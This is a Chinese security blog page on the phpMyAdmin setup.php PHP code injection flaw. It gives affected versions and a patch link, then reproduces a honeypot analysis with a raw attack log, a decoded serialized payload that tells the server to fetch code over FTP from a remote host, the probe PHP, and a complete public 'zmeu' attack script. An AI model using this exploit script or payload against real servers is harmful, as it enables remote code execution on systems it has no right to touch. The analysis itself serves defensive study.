phpMyAdmin (/scripts/setup.php) PHP 注入代码

此漏洞代码在以下环境测试通过:
      phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 及 3.0.1.1版本;
      Linux内核版本 2.6.24-24-generic i686 GNU/Linux (Ubuntu 8.04.2);
      攻击环境要求:
      phpMyAdmin版本:早于2.11.9.5的2.11.x和早于3.1.3.1的3.x;
      此漏洞只针对采用向导模式安装的phpMyAdmin有效,而对采用手动安装的无效;
      管理员必须未删除"/phpMyAdmin/"目录下的"/config/"子目录,因为"/scripts/setup.php"尝试创建的下面PHP代码注入的"config.inc.php"文件正是在这个子目录下。

http://www.cfresh.net/web-security/179

-----------------------------------------------------------------------------------------

受影响系统:
phpMyAdmin phpMyAdmin 3.x
phpMyAdmin phpMyAdmin 2.11.x

不受影响系统:
phpMyAdmin phpMyAdmin 3.1.3.1
phpMyAdmin phpMyAdmin 2.11.9.5

描述:
phpMyAdmin是用PHP编写的工具,用于通过WEB管理MySQL。

phpMyAdmin的Setup脚本用于生成配置。如果远程攻击者向该脚本提交了特制的POST请求的话,就可能在生成的config.inc.php配置文件中包含任意PHP代码。由于配置文件被保存到了服务器上,未经认证的远程攻击者可以利用这个漏洞执行任意PHP代码。

厂商补丁:

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://phpmyadmin.svn.sourceforge.net/viewvc/phpmyadmin?view=rev&revision=12301

---------------------------------------------------------------------

PhpMyAdmin setup.php RFI Attacks Detected

SpiderLabs is the corporate sponsor of the WASC Distributed Web Honeypots Project which is an awesome research project to identify automated web attacks. I was looking in our central ModSecurity AuditConsolelogging host today and I noticed a spike in traffic from some Russian IPs that were scanning for the PMASA-2010-4 vulnerability in the PhpMyAdmin setup.php script.

Let's look at the raw ModSecurity audit log data of the inbound request:

--4064df0e-A--[10/Apr/2012:18:05:55 +0000] T4R2gwowybkAAHp9G@sAAAAF 212.24.61.167 38767 XXX.XXX.XXX.XXX 80--4064df0e-B--POST /pma/scripts/setup.php HTTP/1.1Connection: closeHost: 176.34.207.219Referer: 176.34.207.219User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]Content-Type: application/x-www-form-urlencodedContent-Length: 238--4064df0e-C--action=lay_navigation&eoltype=unix&token=&configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA%5FConfig%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A55%3A%22ftp%3A%2F%2Fthewinecompany%3AgXNbUEwfLa%4046%2E32%2E228%2E222%2F%2Ea%2Fid%2Etxt%22%3B%7D%7D

If we URL decode the request body data, we get this:

action=lay_navigation&eoltype=unix&token=&configuration=a:1:{i:0;O:10:"PMA_Config":1:{<span><strong>s:6:"source";s:55:"ftp://thewinecompany:gXNbUEwfLa@46.32.228.222/.a/id.txt"</strong></span>;}}

As you can see, the attacker is attempting overwrite the PhpMyAdmin configuration file by instructing it to use FTP to download and run the "id.txt" file on a remote site. The contents of the id.txt file is PHP code:

<?phpprint(base64_decode("c3Q0cjc="));echo(php_uname());print(base64_decode("ZjFuMTVo"));die;?>

Looking at what this file is doing, it appears to be a simple probe to identify if the target web application is vulnerable to this type of RFI attack. If the application responds with the output from these PHP commands, then the attacker will proceed with other attacks. SpiderLabs Research was able to find the following script. in public forums that launch similar attacks:

/* wtf zmeu was here haha,yeah me... found this sh*t bug on pmasux */$arguments = getopt("a:b:c");$pma_setup_url = $arguments[a];//echo $arguments[a];$ftp_code = 'ftp://devil:devil@85.10.138.51/c.txt';//$method = POST|GET, $url = http:// /path, $data = foo1=bar1&foo2=bar2, referer, cookie, useragent
function send_data($method, $url, $data = '', $referer_string = '', $cookie_string = '', $ua_string = ''){$return = '';$feof_count = 0;$parsed_url = parse_url($url);$site = $parsed_url;$path = $parsed_url;$query = $parsed_url;($method == 'GET' && !empty($data)) ? $path .= '?'.$data : '';($method == 'POST' && !empty($query)) ? $path .= '?'.$query : '';$fp = fsockopen($site, 80, $errno, $errstr, 30);($method == 'POST') ? $out = "POST $path HTTP/1.1\r\n" : $out = "GET $path HTTP/1.1\r\n";$out .= "Host: $site\r\n";$out .= "Content-type: application/x-www-form-urlencoded\r\n";$out .= "Connection: Close\r\n";$out .= "User-Agent: $ua_string\r\n";$out .= "Referer: $referer_string\r\n";$out .= "Cookie: $cookie_string\r\n";($method == 'POST') ? $out .= "Content-Length: ".strlen($data)."\r\n\r\n" : $out .= "\r\n";($method == 'POST') ? fwrite($fp, $out.$data) : fwrite($fp, $out);while (!feof($fp)){if($feof_count >=200)break;$return .= fread($fp, 4800);++$feof_count;}fclose($fp);return $return;}$token_page = send_data('GET',$pma_setup_url,'',$pma_setup_url,'','Opera');preg_match('@name="token" value="(a-f0-9{32})"@is',$token_page,$token_array);
$token = $token_array[1];preg_match_all('@Set-Cookie: (<span>^\r\n;</span>+)@is',$token_page,$cookie_array);$cookie_array = $cookie_array[1];$cookie_array = implode("; ",$cookie_array);printsend_data('POST',$pma_setup_url,'action=lay_navigation&eoltype=unix&token='.$token.'&configuration='.urlencode('a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:'.strlen($ftp_code).':"'.$ftp_code.'";}}'),$pma_setup_url,$cookie_array,'Opera');

This issue was patched in the php source code with the following update:

By filtering out non-word characters, it would prevent the attacker from injecting the RFI code

phpMyAdmin setup.php脚本的任意PHP代码注入漏洞的更多相关文章

  1. WordPress Woopra Analytics插件‘ofc_upload_image.php’任意PHP代码执行漏洞

    漏洞名称: WordPress Woopra Analytics插件‘ofc_upload_image.php’任意PHP代码执行漏洞 CNNVD编号: CNNVD-201310-195 发布时间: ...

  2. 阿里云提示Discuz uc.key泄露导致代码注入漏洞uc.php的解决方法

    适用所有用UC整合 阿里云提示漏洞: discuz中的/api/uc.php存在代码写入漏洞,导致黑客可写入恶意代码获取uckey,.......... 漏洞名称:Discuz uc.key泄露导致代 ...

  3. Discuz ML! V3.X 代码注入漏洞

    Discuz ML! V3.X 代码注入漏洞 前言 Discuz!ML是一个由CodersClub.org创建的多语言,集成,功能齐全的开源网络平台,用于构建像"社交网络"这样的互 ...

  4. Discuz uc.key泄露导致代码注入漏洞

    漏洞描述:在Discuz中,uc_key是UC客户端与服务端通信的通信密钥,discuz中的/api/uc.php存在代码写入漏洞,导致黑客可写入恶意代码获取uckey,最终进入网站后台,造成数据泄漏 ...

  5. CVE漏洞—PHPCMS2008 /type.php代码注入高危漏洞预警

    11月4日,阿里云安全首次捕获PHPCMS 2008版本的/type.php远程GetShell 0day利用攻击,攻击者可以利用该漏洞远程植入webshell,导致文件篡改.数据泄漏.服务器被远程控 ...

  6. HTML5 App的代码注入攻击

    原文链接 摘要 基于HTML5的手机app(译者注:以下简称HTML5 app)越来越流行了, 在大多数情况下它比native应用更容易适配不同的移动操作系统.它开发起来很方便,可以使用标准的web技 ...

  7. phpcms2008远程代码执行漏洞

    phpcms2008远程代码执行漏洞 描述: 近日,互联网爆出PHPCMS2008代码注入漏洞(CVE-2018-19127).攻击者利用该漏洞,可在未授权的情况下实现对网站文件的写入.该漏洞危害程度 ...

  8. ref:PHP代码注入审计

    ref:https://www.waitalone.cn/php-code-injection.html 通俗易懂,全面清晰. 0x1 前言 为了方便自己以后的翻阅和查找,最近正在整理一些所学的内容. ...

  9. 帝国CMS(EmpireCMS) v7.5 代码注入分析(CVE-2018-19462)

    帝国CMS(EmpireCMS) v7.5 代码注入分析(CVE-2018-19462) 一.漏洞描述 EmpireCMS7.5及之前版本中的admindbDoSql.php文件存在代码注入漏洞.该漏 ...

随机推荐

  1. Entity Framework(EF) Code First将实体中的string属性映射成text类型的几种方式

    1.通过ColumnType属性设置 [Column(TypeName="text")] public string Text { get; set; } 在进行以上属性设置时,请 ...

  2. SSH & Git

    SSH基本用法 SSH服务详解 work with git branch some tips for git setup and git config git and github ssh servi ...

  3. 【BZOJ1081】[SCOI2005]超级格雷码(搜索)

    [BZOJ1081][SCOI2005]超级格雷码(搜索) 题面 BZOJ 洛谷 题解 找个规律吧,自己随便手玩一下,就按照正常的顺序枚举一下,发现分奇偶位考虑正序还是逆序就好了. #include& ...

  4. 【BZOJ1071】[SCOI2007]组队(神仙题)

    [BZOJ1071][SCOI2007]组队(神仙题) 题面 BZOJ 洛谷 题解 首先把式子整理一下,也就是\(A*h+B*v\le C+A*minH+B*minV\) 我们正常能够想到的做法是钦定 ...

  5. MySQL命令行查询乱码解决办法

    MySQL会出现中文乱码的原因不外乎下列几点: 1.server本身设定问题,例如还停留在latin1 2.table的语系设定问题(包含character与collation) 3.客户端程式(例如 ...

  6. python---django中form组件(2)自定制属性以及表单的各种验证,以及数据源的实时更新,以及和数据库关联使用ModelForm和元类

    自定义属性以及各种验证 分析widget: class TestForm(forms.Form): user = fields.CharField( required = True, widget = ...

  7. JAVA记录-JSP指令

    JSP中有三种类型的指令标签 - 序号 指令 说明 1 <%@ page ... %> 定义页面相关属性,如脚本语言,错误页面和缓冲要求. 2 <%@ include ... %&g ...

  8. 百度钱包、百付宝、baifubao接入支付的常见问题

    [5004:参数非法,请检查输入参数后重试.]:检查是否缺少了其它必要的参数,我当时是缺少了order_no [5804,抱歉,订单创建失败,请联系客服处理]:即验证签名失败,这个只能参考文档进行处理 ...

  9. (32位)本体学习程序(ontoEnrich)系统使用说明文档

    系统运行:文件夹system下,可执行文件ontoEnrichment --------------------------------------------------------1.简单概念学习 ...

  10. go语言学习之路(一)Hello World

    为什么要使用 Go 语言?Go 语言的优势在哪里? 1.部署简单. 2.并发性好. 3.良好的语言设计. 4.执行性能好. Go环境搭建 Golang下载 国外镜像  https://www.gola ...